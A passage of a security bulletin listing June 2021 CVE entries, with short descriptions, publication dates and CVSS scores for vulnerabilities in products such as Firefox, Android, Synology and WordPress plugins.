greenbone — greenbone_security_assistant Greenbone Security Assistant (GSA) before 8.0.2 and Greenbone OS (GOS) before 5.0.10 allow XSS during 404 URL handling in gsad. 2021-06-21 4.3 CVE-2019-25047
MISC
MISC
MISC
hisiphp — hisiphp Cross Site Scripting (XSS) vulnerability in HisiPHP 2.0.8 via the group name in addgroup.html. 2021-06-21 4.3 CVE-2020-21130
MISC
icehrm — icehrm A cross site request forgery (CSRF) vulnerability was discovered in Ice Hrm 29.0.0.OS which allows attackers to create new admin accounts or change users’ passwords. 2021-06-22 6.8 CVE-2021-34244
MISC
icehrm — icehrm A session fixation vulnerability was discovered in Ice Hrm 29.0.0 OS which allows an attacker to hijack a valid user session via a crafted session cookie. 2021-06-22 5.8 CVE-2021-35046
MISC
icehrm — icehrm Cross site scripting (XSS) vulnerability in Ice Hrm 29.0.0.OS, allows attackers to execute arbitrary code via the parameters to the /app/ endpoint. 2021-06-22 4.3 CVE-2021-35045
MISC
increments — qiita_markdown Increments Qiita::Markdown before 0.34.0 allows XSS via a crafted gist link, a different vulnerability than CVE-2021-28796. 2021-06-21 4.3 CVE-2021-28833
MISC
MISC
is-svg_project — is-svg A vulnerability was discovered in IS-SVG version 4.3.1 and below where a Regular Expression Denial of Service (ReDOS) occurs if the application is provided and checks a crafted invalid SVG string. 2021-06-21 5 CVE-2021-29059
MISC
MISC
MISC
MISC
joomla — joomla! Joomla! Core is prone to a session fixation vulnerability. An attacker may leverage this issue to hijack an arbitrary session and gain access to sensitive information, which may help in launching further attacks. Joomla! Core versions 1.5.x ranging from 1.5.0 and up to and including 1.5.15 are vulnerable. 2021-06-21 5 CVE-2010-1434
MISC
MISC
joomla — joomla! Joomla! Core is prone to an information disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may help in launching further attacks. Joomla! Core versions 1.5.x ranging from 1.5.0 and up to and including 1.5.15 are vulnerable. 2021-06-21 5 CVE-2010-1432
MISC
MISC
juqingcms — juqingcms Cross Site Request Forgery (CSRF) in JuQingCMS v1.0 allows remote attackers to gain local privileges via the component “JuQingCMS_v1.0/admin/index.php?c=administrator&a=add”. 2021-06-22 6.8 CVE-2020-18648
MISC
mcusystem — mcusystem The login page in the MCUsystem does not filter with special characters, which allows remote attackers can inject JavaScript without privilege and thus perform reflected XSS attacks. 2021-06-18 4.3 CVE-2021-32536
MISC
metinfo — metinfo Cross Site Scripting (XSS) vulnerability in MetInfo 7.0.0 via the gourl parameter in login.php. 2021-06-21 4.3 CVE-2020-21517
MISC
MISC
MISC
moxa — mgate_mb3180_firmware An issue was discovered on MOXA Mgate MB3180 Version 2.1 Build 18113012. Attackers can use slowhttptest tool to send incomplete HTTP request, which could make server keep waiting for the packet to finish the connection, until its resource exhausted. Then the web server is denial-of-service. 2021-06-18 5 CVE-2021-33824
MISC
MISC
MISC
moxa — mgate_mb3180_firmware An issue was discovered on MOXA Mgate MB3180 Version 2.1 Build 18113012. Attacker could send a huge amount of TCP SYN packet to make web service’s resource exhausted. Then the web server is denial-of-service. 2021-06-18 5 CVE-2021-33823
MISC
MISC
mozilla — firefox Firefox for Android would become unstable and hard-to-recover when a website opened too many popups. *This bug only affects Firefox for Android. Other operating systems are unaffected.*. This vulnerability affects Firefox < 89. 2021-06-24 4.3 CVE-2021-29962
MISC
MISC
mozilla — firefox When drawing text onto a canvas with WebRender disabled, an out of bounds read could occur. *This bug only affects Firefox on Windows. Other operating systems are unaffected.*. This vulnerability affects Firefox < 89.0.1. 2021-06-24 5.8 CVE-2021-29968
MISC
MISC
mozilla — firefox Mozilla developers reported memory safety bugs present in Firefox 88. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 89. 2021-06-24 6.8 CVE-2021-29966
MISC
MISC
mozilla — firefox When Web Render components were destructed, a race condition could have caused undefined behavior, and we presume that with enough effort may have been exploitable to run arbitrary code. This vulnerability affects Firefox < 88.0.1 and Firefox for Android < 88.1.3. 2021-06-24 5.1 CVE-2021-29952
MISC
MISC
mozilla — firefox Mozilla developers and community members reported memory safety bugs present in Firefox 87. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 88. 2021-06-24 6.8 CVE-2021-29947
MISC
MISC
mozilla — firefox Ports that were written as an integer overflow above the bounds of a 16-bit integer could have bypassed port blocking restrictions when used in the Alt-Svc header. This vulnerability affects Firefox ESR < 78.10, Thunderbird < 78.10, and Firefox < 88. 2021-06-24 6.8 CVE-2021-29946
MISC
MISC
MISC
MISC
mozilla — firefox When a download was initiated, the client did not check whether it was in normal or private browsing mode, which led to private mode cookies being shared in normal browsing mode. This vulnerability affects Firefox for iOS < 34. 2021-06-24 4.3 CVE-2021-29958
MISC
MISC
mozilla — firefox Mozilla developers reported memory safety bugs present in Firefox 88 and Firefox ESR 78.11. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Thunderbird < 78.11, Firefox < 89, and Firefox ESR < 78.11. 2021-06-24 6.8 CVE-2021-29967
MISC
MISC
MISC
MISC
mozilla — thunderbird Thunderbird unprotects a secret OpenPGP key prior to using it for a decryption, signing or key import task. If the task runs into a failure, the secret key may remain in memory in its unprotected state. This vulnerability affects Thunderbird < 78.8.1. 2021-06-24 5 CVE-2021-29950
MISC
MISC
mpmath — mpmath A Regular Expression Denial of Service (ReDOS) vulnerability was discovered in Mpmath v1.0.0 when the mpmathify function is called. 2021-06-21 5 CVE-2021-29063
MISC
MISC
MISC
MISC
nvidia — jetson_linux Bootloader contains a vulnerability in NVIDIA MB2 where a potential heap overflow might allow an attacker to control all the RAM after the heap block, leading to denial of service or code execution. 2021-06-21 4.6 CVE-2021-34388
CONFIRM
openbsd — openbsd It was found in FreeBSD 8.0, 6.3 and 4.9, and OpenBSD 4.6 that a null pointer dereference in ftpd/popen.c may lead to remote denial of service of the ftpd service. 2021-06-22 5 CVE-2010-4816
MISC
MISC
MISC
owasp — enterprise_security_api_for_java It was found that all OWASP ESAPI for Java up to version 2.0 RC2 are vulnerable to padding oracle attacks. 2021-06-22 4.3 CVE-2010-3300
MISC
MISC
phpgurukul — hospital_management_system_in_php PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in hmscheck_availability.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information. 2021-06-22 5 CVE-2020-22164
MISC
phpgurukul — hospital_management_system_in_php PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in hmsforgot-password.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information. 2021-06-22 5 CVE-2020-22166
MISC
phpgurukul — hospital_management_system_in_php PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in hmsuser-login.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information. 2021-06-22 5 CVE-2020-22165
MISC
phpgurukul — hospital_management_system_in_php PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in hmsedit-profile.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information. 2021-06-22 5 CVE-2020-22173
MISC
phpgurukul — hospital_management_system_in_php PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in hmsadminbetweendates-detailsreports.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information. 2021-06-22 5 CVE-2020-22175
MISC
phpgurukul — hospital_management_system_in_php PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in hmsbook-appointment.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information. 2021-06-22 5 CVE-2020-22174
MISC
phpgurukul — hospital_management_system_in_php PHPGurukul Hospital Management System in PHP v4.0 has a sensitive information disclosure vulnerability in multiple areas. Remote unauthenticated users can exploit the vulnerability to obtain user sensitive information. 2021-06-22 5 CVE-2020-22176
MISC
phpgurukul — hospital_management_system_in_php PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in hmsget_doctor.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information. 2021-06-22 5 CVE-2020-22172
MISC
phpgurukul — hospital_management_system_in_php PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in hmsregistration.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information. 2021-06-22 5 CVE-2020-22171
MISC
phpgurukul — hospital_management_system_in_php PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in hmsappointment-history.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information. 2021-06-22 5 CVE-2020-22169
MISC
phpgurukul — hospital_management_system_in_php PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in hmschange-emaild.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information. 2021-06-22 5 CVE-2020-22168
MISC
MISC
phpgurukul — hospital_management_system_in_php PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in hmsget_doctor.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information. 2021-06-22 5 CVE-2020-22170
MISC
phpipam — phpipam phpIPAM 1.4.3 allows Reflected XSS via app/dashboard/widgets/ipcalc-result.php and app/tools/ip-calculator/result.php of the IP calculator. 2021-06-23 4.3 CVE-2021-35438
MISC
powerarchiver — powerarchiver The XML parser used in ConeXware PowerArchiver before 20.10.02 allows processing of external entities, which might lead to exfiltration of local files over the network (via an XXE attack). 2021-06-21 4.3 CVE-2021-28684
MISC
MISC
prototypejs — prototype An issue was discovered in the stripTags and unescapeHTML components in Prototype 1.7.3 version 1.6 and below where an attacker can cause a Regular Expression Denial of Service (ReDOS) through stripping crafted HTML tags. 2021-06-21 5 CVE-2020-27511
MISC
MISC
MISC
riot-os — riot RIOT-OS 2021.01 before commit 85da504d2dc30188b89f44c3276fc5a25b31251f contains a buffer overflow which could allow attackers to obtain sensitive information. 2021-06-18 5 CVE-2021-31660
MISC
CONFIRM
riot-os — riot RIOT-OS 2021.01 before commit 609c9ada34da5546cffb632a98b7ba157c112658 contains a buffer overflow that could allow attackers to obtain sensitive information. 2021-06-18 5 CVE-2021-31661
MISC
CONFIRM
riot-os — riot RIOT-OS 2021.01 before commit 07f1254d8537497552e7dce80364aaead9266bbe contains a buffer overflow which could allow attackers to obtain sensitive information. 2021-06-18 5 CVE-2021-31662
CONFIRM
MISC
riot-os — riot RIOT-OS 2021.01 before commit bc59d60be60dfc0a05def57d74985371e4f22d79 contains a buffer overflow which could allow attackers to obtain sensitive information. 2021-06-18 5 CVE-2021-31663
MISC
MISC
CONFIRM
riot-os — riot RIOT-OS 2021.01 before commit 44741ff99f7a71df45420635b238b9c22093647a contains a buffer overflow which could allow attackers to obtain sensitive information. 2021-06-18 5 CVE-2021-31664
MISC
CONFIRM
serenityos — serenityos SerenityOS contains a buffer overflow in the set_range test in TestBitmap which could allow attackers to obtain sensitive information. 2021-06-18 5 CVE-2021-33185
CONFIRM
serenityos — serenityos SerenityOS in test-crypto.cpp contains a stack buffer overflow which could allow attackers to obtain sensitive information. 2021-06-18 5 CVE-2021-33186
CONFIRM
sing4g — 4gee_router_hh70vb_firmware An issue was discovered on 4GEE ROUTER HH70VB Version HH70_E1_02.00_22. Attackers can use slowhttptest tool to send incomplete HTTP request, which could make server keep waiting for the packet to finish the connection, until its resource exhausted. Then the web server is denial-of-service. 2021-06-18 5 CVE-2021-33822
MISC
MISC
MISC
sonatype — nexus_repository_manager Sonatype Nexus Repository Manager 3.x before 3.31.0 allows a remote authenticated attacker to get a list of blob files and read the content of a blob file (via a GET request) without having been granted access. 2021-06-18 4 CVE-2021-34553
CONFIRM
striptags_project — striptags The npm package “striptags” is an implementation of PHP’s strip_tags in Typescript. In striptags before version 3.2.0, a type-confusion vulnerability can cause `striptags` to concatenate unsanitized strings when an array-like object is passed in as the `html` parameter. This can be abused by an attacker who can control the shape of their input, e.g. if query parameters are passed directly into the function. This can lead to a XSS. 2021-06-18 5 CVE-2021-32696
MISC
MISC
CONFIRM
MISC
synology — calendar Use of hard-coded credentials vulnerability in php component in Synology Calendar before 2.4.0-0761 allows remote attackers to obtain sensitive information via unspecified vectors. 2021-06-18 5 CVE-2021-34812
CONFIRM
synology — download_station Server-Side Request Forgery (SSRF) vulnerability in task management component in Synology Download Station before 3.8.16-3566 allows remote authenticated users to access intranet resources via unspecified vectors. 2021-06-18 4 CVE-2021-34811
CONFIRM
synology — download_station Improper privilege management vulnerability in cgi component in Synology Download Station before 3.8.16-3566 allows remote authenticated users to execute arbitrary code via unspecified vectors. 2021-06-18 6.5 CVE-2021-34810
CONFIRM
synology — download_station Improper neutralization of special elements used in a command (‘Command Injection’) vulnerability in task management component in Synology Download Station before 3.8.16-3566 allows remote authenticated users to execute arbitrary code via unspecified vectors. 2021-06-18 6.5 CVE-2021-34809
CONFIRM
synology — media_server Server-Side Request Forgery (SSRF) vulnerability in cgi component in Synology Media Server before 1.8.3-2881 allows remote attackers to access intranet resources via unspecified vectors. 2021-06-18 5 CVE-2021-34808
CONFIRM
theologeek — manuskript ** DISPUTED ** Manuskript through 0.12.0 allows remote attackers to execute arbitrary code via a crafted settings.pickle file in a project file, because there is insecure deserialization via the pickle.load() function in settings.py. NOTE: the vendor’s position is that the product is not intended for opening an untrusted project file. 2021-06-21 6.8 CVE-2021-35196
MISC
MISC
tielabs — jannah The Jannah WordPress theme before 5.4.4 did not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability. 2021-06-21 4.3 CVE-2021-24364
CONFIRM
typesettercms — typesetter Cross Site Scriptiong vulnerability in Typesetter 5.1 via the !1) className and !2) Description fields in index.php/Admin/Classes, 2021-06-21 4.3 CVE-2020-19511
MISC
MISC
ui — camera_g3_flex_firmware An issue was discovered in UniFi Protect G3 FLEX Camera Version UVC.v4.30.0.67.Attacker could send a huge amount of TCP SYN packet to make web service’s resource exhausted. Then the web server is denial-of-service. 2021-06-18 5 CVE-2021-33820
MISC
MISC
MISC
ui — camera_g3_flex_firmware An issue was discovered in UniFi Protect G3 FLEX Camera Version UVC.v4.30.0.67. Attackers can use slowhttptest tool to send incomplete HTTP request, which could make server keep waiting for the packet to finish the connection, until its resource exhausted. Then the web server is denial-of-service. 2021-06-18 5 CVE-2021-33818
MISC
MISC
MISC
vanillaforums — vanilla_forums It was found in vanilla forums before 2.0.10 a cross-site scripting vulnerability where a filename could contain arbitrary code to execute on the client side. 2021-06-22 4.3 CVE-2010-4264
MISC
MISC
vanillaforums — vanilla_forums It was found in vanilla forums before 2.0.10 a potential linkbait vulnerability in dispatcher. 2021-06-22 5.8 CVE-2010-4266
MISC
vfsjfilechooser2_project — vfsjfilechooser2 A Regular Expression Denial of Service (ReDOS) vulnerability was discovered in Vfsjfilechooser2 version 0.2.9 and below which occurs when the application attempts to validate crafted URIs. 2021-06-21 5 CVE-2021-29061
MISC
MISC
MISC
MISC
MISC
vmware — tools VMware Tools for Windows (11.x.y prior to 11.3.0) contains a denial-of-service vulnerability in the VM3DMP driver. A malicious actor with local user privileges in the Windows guest operating system, where VMware Tools is installed, can trigger a PANIC in the VM3DMP driver leading to a denial-of-service condition in the Windows guest operating system. 2021-06-18 4.9 CVE-2021-21997
MISC
white_shark_systems_project — white_shark_systems White Shark System (WSS) 1.3.2 has a SQL injection vulnerability. The vulnerability stems from the log_edit.php files failing to filter the csa_to_user parameter, remote attackers can exploit the vulnerability to obtain database sensitive information. 2021-06-21 5 CVE-2020-20469
MISC
white_shark_systems_project — white_shark_systems White Shark System (WSS) 1.3.2 is vulnerable to sensitive information disclosure via default_task_add.php, remote attackers can exploit the vulnerability to create a task. 2021-06-21 6.4 CVE-2020-20467
MISC
white_shark_systems_project — white_shark_systems White Shark System (WSS) 1.3.2 is vulnerable to CSRF. Attackers can use the user_edit_password.php file to modify the user password. 2021-06-21 4.3 CVE-2020-20468
MISC
white_shark_systems_project — white_shark_systems White Shark System (WSS) 1.3.2 has web site physical path leakage vulnerability. 2021-06-21 5 CVE-2020-20470
MISC
white_shark_systems_project — white_shark_systems White Shark System (WSS) 1.3.2 has a sensitive information disclosure vulnerability. The if_get_addbook.php file does not have an authentication operation. Remote attackers can obtain username information for all users of the current site. 2021-06-21 5 CVE-2020-20472
MISC
white_shark_systems_project — white_shark_systems White Shark System (WSS) 1.3.2 has a SQL injection vulnerability. The vulnerability stems from the default_task_edituser.php files failing to filter the csa_to_user parameter. Remote attackers can exploit the vulnerability to obtain database sensitive information. 2021-06-21 5 CVE-2020-20474
MISC
white_shark_systems_project — white_shark_systems White Shark System (WSS) 1.3.2 has a SQL injection vulnerability. The vulnerability stems from the control_task.php, control_project.php, default_user.php files failing to filter the sort parameter. Remote attackers can exploit the vulnerability to obtain database sensitive information. 2021-06-21 5 CVE-2020-20473
MISC
wuzhicms — wuzhicms Cross Site Scripting (XSS) in Wuzhi CMS v4.1.0 allows remote attackers to execute arbitrary code via the “Title” parameter in the component “/coreframe/app/guestbook/myissue.php”. 2021-06-22 4.3 CVE-2020-18654
MISC
zettlr — zettlr No filtering of cross-site scripting (XSS) payloads in the markdown-editor in Zettlr 1.8.7 allows attackers to perform remote code execution via a crafted file. 2021-06-18 4.3 CVE-2021-26835
MISC
MISC
zziplib_project — zziplib Infinite Loop in zziplib v0.13.69 allows remote attackers to cause a denial of service via the return value “zzip_file_read” in the function “unzzip_cat_file”. 2021-06-18 4.3 CVE-2020-18442
MISC

Back to top

 

Low Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
admincolumns — admin_columns The Admin Columns Free WordPress plugin before 4.3 and Admin Columns Pro WordPress plugin before 5.5.1, rendered input on the posted pages with improper input validation on the value passed into the field ‘Label’ parameter, by taking this as an advantage an authenticated attacker can supply a crafted arbitrary script and execute it. 2021-06-21 3.5 CVE-2021-24366
CONFIRM
MISC
autoptimize — autoptimize The Autoptimize WordPress plugin before 2.7.8 does not check for malicious files such as .html in the archive uploaded via the ‘Import Settings’ feature. As a result, it is possible for a high privilege user to upload a malicious file containing JavaScript code inside an archive which will execute when a victim visits index.html inside the plugin directory. 2021-06-21 3.5 CVE-2021-24378
CONFIRM
ayecode — getpaid In the GetPaid WordPress plugin before 2.3.4, users with the contributor role and above can create a new Payment Form, however the Label and Help Text input fields were not getting sanitized properly. So it was possible to inject malicious content such as img tags, leading to a Stored Cross-Site Scripting issue which is triggered when the form will be edited, for example when an admin reviews it and could lead to privilege escalation. 2021-06-21 3.5 CVE-2021-24369
CONFIRM
checksec — canopy CheckSec Canopy before 3.5.2 allows XSS attacks against the login page via the LOGIN_PAGE_DISCLAIMER parameter. 2021-06-18 3.5 CVE-2021-34815
MISC
MISC
MISC
codecabin — wp_google_maps The WP Google Maps WordPress plugin before 8.1.12 did not sanitise, validate of escape the Map Name when output in the Map List of the admin dashboard, leading to an authenticated Stored Cross-Site Scripting issue 2021-06-21 3.5 CVE-2021-24383
CONFIRM
MISC
get-simple — getsimplecms Cross Site Scripting vulnerability in GetSimpleCMS 3.4.0a in admin/snippets.php via (1) Add Snippet and (2) Save snippets. 2021-06-23 3.5 CVE-2020-20391
MISC
get-simple — getsimplecms Cross Site Scripting vulnerability in GetSimpleCMS 3.3.16 in admin/upload.php by adding comments or jpg and other file header information to the content of xla, pages, and gzip files, 2021-06-23 3.5 CVE-2021-28977
MISC
get-simple — getsimplecms Cross Site Scripting (XSS) vulnerability in GetSimpleCMS 3.4.0a in admin/edit.php. 2021-06-23 3.5 CVE-2020-20389
MISC
google — android In onStart of ContactsDumpActivity.java, there is possible access to contacts due to a tapjacking/overlay attack. This could lead to local information disclosure with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-174045870 2021-06-22 1.9 CVE-2021-0569
MISC
google — android In sspRequestCallback of BondStateMachine.java, there is a possible leak of Bluetooth MAC addresses due to log information disclosure. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-183961896 2021-06-22 2.1 CVE-2021-0549
MISC
google — android In doNotification of AccountManagerService.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-177931355 2021-06-22 2.1 CVE-2021-0572
MISC
google — android In accessAudioHalPidscpp of TimeCheck.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-175894436 2021-06-22 2.1 CVE-2021-0566
MISC
google — android In ih264e_fmt_conv_422i_to_420sp of ih264e_fmt_conv.c, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-172908358 2021-06-22 2.1 CVE-2021-0563
MISC
google — android In RasterIntraUpdate of motion_est.cpp, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-176084648 2021-06-22 2.1 CVE-2021-0562
MISC
google — android In append_to_verify_fifo_interleaved_ of stream_encoder.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-174302683 2021-06-22 2.1 CVE-2021-0561
MISC
google — android In getBlockSum of fastcodemb.cpp, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-172716941 2021-06-22 2.1 CVE-2021-0556
MISC
google — android In isBackupServiceActive of BackupManagerService.java, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-158482162 2021-06-22 2.1 CVE-2021-0554
MISC
google — android In getEndItemSliceAction of MediaOutputSlice.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-175124820 2021-06-22 2.1 CVE-2021-0552
MISC
google — android In updateNotification of BeamTransferManager.java, there is a missing permission check. This could lead to local information disclosure of paired Bluetooth addresses with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-168712890 2021-06-22 2.1 CVE-2021-0542
MISC
google — android In phNxpNciHal_ext_process_nfc_init_rsp of phNxpNciHal_ext.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure in the NFC server with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-169258455 2021-06-22 2.1 CVE-2021-0541
MISC
google — android In getAllPackages of PackageManagerService, there is a possible information disclosure due to a missing permission check. This could lead to local information disclosure of cross-user permissions with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-174661955 2021-06-21 2.1 CVE-2021-0521
MISC
google — android In avrc_pars_browse_rsp of avrc_pars_ct.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-179162665 2021-06-21 3.3 CVE-2021-0504
MISC
icehrm — icehrm A stored cross site scripting (XSS) vulnerability was discovered in Ice Hrm 29.0.0.OS which allows attackers to execute arbitrary web scripts or HTML via a crafted file uploaded into the Document Management tab. The exploit is triggered when a user visits the upload location of the crafted file. 2021-06-22 3.5 CVE-2021-34243
MISC
jpress — jpress An issue was discovered in JPress v3.3.0 and below. There are XSS vulnerabilities in the template module and tag management module. If you log in to the background by means of weak password, the storage XSS vulnerability can occur. 2021-06-18 3.5 CVE-2021-33347
MISC
MISC
phpgurukul — hospital_management_system_in_php PHPGurukul Hospital Management System in PHP v4.0 has a Persistent Cross-Site Scripting vulnerability in hmsadminappointment-history.php. Remote registered users can exploit the vulnerability to obtain user cookie data. 2021-06-22 3.5 CVE-2020-22167
MISC
podsfoundation — pods The Pods – Custom Content Types and Fields WordPress plugin before 2.7.27 was vulnerable to an Authenticated Stored Cross-Site Scripting (XSS) security vulnerability within the ‘Menu Label’ field parameter. 2021-06-21 3.5 CVE-2021-24339
MISC
CONFIRM
podsfoundation — pods The Pods – Custom Content Types and Fields WordPress plugin before 2.7.27 was vulnerable to an Authenticated Stored Cross-Site Scripting (XSS) security vulnerability within the ‘Singular Label’ field parameter. 2021-06-21 3.5 CVE-2021-24338
CONFIRM
MISC
wp_config_file_editor_project — wp_config_file_editor The WP Config File Editor WordPress plugin through 1.7.1 was affected by an Authenticated Stored Cross-Site Scripting (XSS) vulnerability. 2021-06-21 3.5 CVE-2021-24367
CONFIRM
znote — znote A cross-site scripting (XSS) vulnerability exists in Znote 0.5.2. An attacker can insert payloads, and the code execution will happen immediately on markdown view mode. 2021-06-18 3.5 CVE-2021-26834
MISC
MISC

Back to top

 

Severity Not Yet Assigned

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
advantech — webaccess_hmi_designer
 
Opening a maliciously crafted project file may cause an out-of-bounds write, which may allow an attacker to execute arbitrary code. User interaction is require on the WebAccess HMI Designer (versions 2.1.9.95 and prior). 2021-06-24 not yet calculated CVE-2021-33002
MISC
advantech — webaccess_hmi_designer
 
Parsing a maliciously crafted project file may cause a heap-based buffer overflow, which may allow an attacker to perform arbitrary code execution. User interaction is required on the WebAccess HMI Designer (versions 2.1.9.95 and prior). 2021-06-24 not yet calculated CVE-2021-33000
MISC
advantech — webaccess_hmi_designer
 
The affected product is vulnerable to memory corruption condition due to lack of proper validation of user supplied files, which may allow an attacker to execute arbitrary code. User interaction is required on the WebAccess HMI Designer (versions 2.1.9.95 and prior). 2021-06-24 not yet calculated CVE-2021-33004
MISC
ampache — ampache
 
Ampache is an open source web based audio/video streaming application and file manager. Due to a lack of input filtering versions 4.x.y are vulnerable to code injection in random.php. The attack requires user authentication to access the random.php page unless the site is running in demo mode. This issue has been resolved in 4.4.3. 2021-06-22 not yet calculated CVE-2021-32644
CONFIRM
MISC
auth0 — auth0
 
The Auth0 Next.js SDK is a library for implementing user authentication in Next.js applications. Versions before and including `1.4.1` are vulnerable to reflected XSS. An attacker can execute arbitrary code by providing an XSS payload in the `error` query parameter which is then processed by the callback handler as an error message. You are affected by this vulnerability if you are using `@auth0/nextjs-auth0` version `1.4.1` or lower **unless** you are using custom error handling that does not return the error message in an HTML response. Upgrade to version `1.4.1` to resolve. The fix adds basic HTML escaping to the error message and it should not impact your users. 2021-06-25 not yet calculated CVE-2021-32702
MISC
CONFIRM
MISC
autodesk — autodesk_dwg
 
An Arbitrary Address Write issue in the Autodesk DWG application can allow a malicious user to leverage the application to write in unexpected paths. In order to exploit this the attacker would need the victim to enable full page heap in the application. 2021-06-25 not yet calculated CVE-2021-27043
MISC
autodesk — dwg
 
A maliciously crafted DWG file can be used to write beyond the allocated buffer while parsing DWG files. This vulnerability can be exploited to execute arbitrary code. 2021-06-25 not yet calculated CVE-2021-27041
MISC
autodesk — dwg
 
A maliciously crafted DWG file can be used to write beyond the allocated buffer while parsing DWG files. The vulnerability exists because the application fails to handle a crafted DWG file, which causes an unhandled exception. An attacker can leverage this vulnerability to execute arbitrary code. 2021-06-25 not yet calculated CVE-2021-27042
MISC
autodesk — dwg
 
A maliciously crafted DWG file can be forced to read beyond allocated boundaries when parsing the DWG file. This vulnerability can be exploited to execute arbitrary code. 2021-06-25 not yet calculated CVE-2021-27040
MISC
avaya — aura_appliance_virtualization_platform_utilities
 
A privilege escalation vulnerability was discovered in Avaya Aura Appliance Virtualization Platform Utilities (AVPU) that may potentially allow a local user to escalate privileges. Affects 8.0.0.0 through 8.1.3.1 versions of AVPU. 2021-06-24 not yet calculated CVE-2021-25653
MISC
avaya — aura_appliance_virtualization_platform_utilities
 
An information disclosure vulnerability was discovered in the directory and file management of Avaya Aura Appliance Virtualization Platform Utilities (AVPU). This vulnerability may potentially allow any local user to access system functionality and configuration information that should only be available to a privileged user. Affects versions 8.0.0.0 through 8.1.3.1 of AVPU. 2021-06-24 not yet calculated CVE-2021-25652
MISC
avaya — aura_device_services
 
An arbitrary code execution vulnerability was discovered in Avaya Aura Device Services that may potentially allow a local user to execute specially crafted scripts. Affects 7.0 through 8.1.4.0 versions of Avaya Aura Device Services. 2021-06-25 not yet calculated CVE-2021-25654
MISC
avaya — aura_experience_portal
 
A vulnerability in the system Service Menu component of Avaya Aura Experience Portal may allow URL Redirection to any untrusted site through a crafted attack. Affected versions include 7.0 through 7.2.3 (without hotfix) and 8.0.0 (without hotfix). 2021-06-24 not yet calculated CVE-2021-25655
MISC
avaya — aura_experience_portal_web
 
Stored XSS injection vulnerabilities were discovered in the Avaya Aura Experience Portal Web management which could allow an authenticated user to potentially disclose sensitive information. Affected versions include 7.0 through 7.2.3 (without hotfix) and 8.0.0 (without hotfix). 2021-06-24 not yet calculated CVE-2021-25656
MISC
avaya — aura_utility_services
 
** UNSUPPORTED WHEN ASSIGNED ** An information disclosure vulnerability was discovered in the directory and file management of Avaya Aura Utility Services. This vulnerability may potentially allow any local user to access system functionality and configuration information that should only be available to a privileged user. Affects all 7.x versions of Avaya Aura Utility Services. 2021-06-24 not yet calculated CVE-2021-25649
MISC
avaya — aura_utility_services
 
** UNSUPPORTED WHEN ASSIGNED ** A privilege escalation vulnerability was discovered in Avaya Aura Utility Services that may potentially allow a local user to execute specially crafted scripts as a privileged user. Affects all 7.x versions of Avaya Aura Utility Services. 2021-06-24 not yet calculated CVE-2021-25650
MISC
avaya — aura_utility_services
 
